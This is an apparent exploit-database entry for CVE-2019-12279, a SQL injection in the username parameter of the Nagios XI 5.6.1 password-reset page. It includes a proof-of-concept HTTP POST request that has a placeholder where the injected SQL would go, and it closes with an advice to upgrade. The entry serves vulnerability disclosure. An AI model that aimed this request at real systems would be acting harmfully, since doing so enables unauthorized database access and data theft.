header-logo
Suggest Exploit
vendor:
Nagiosxi
by:
JameelNabbo
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Nagiosxi
Affected Version From: xi-5.6.1
Affected Version To: xi-5.6.1
Patch Exists: YES
Related CWE: CVE-2019-12279
CPE: a:nagios:nagiosxi
Other Scripts: N/A
Platforms Tested: MacOSX
2019

Nagiosxi username sql injection

A SQL injection vulnerability exists in Nagiosxi 5.6.1, which allows an attacker to execute arbitrary SQL commands via the username parameter in the login.php page. This can be exploited to gain access to the application and potentially gain access to sensitive data.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Nagiosxi.
Source

Exploit-DB raw data:

# Exploit Title: Nagiosxi username sql injection
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.nagios.com
# Software Link: https://www.nagios.com/products/nagios-xi/
# Version: xi-5.6.1
# Tested on: MacOSX
#CVE: CVE-2019-12279

POC:

POST /nagiosxi/login.php?forgotpass HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/nagiosxi/login.php?forgotpass
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Connection: close
Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
Upgrade-Insecure-Requests: 1

page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}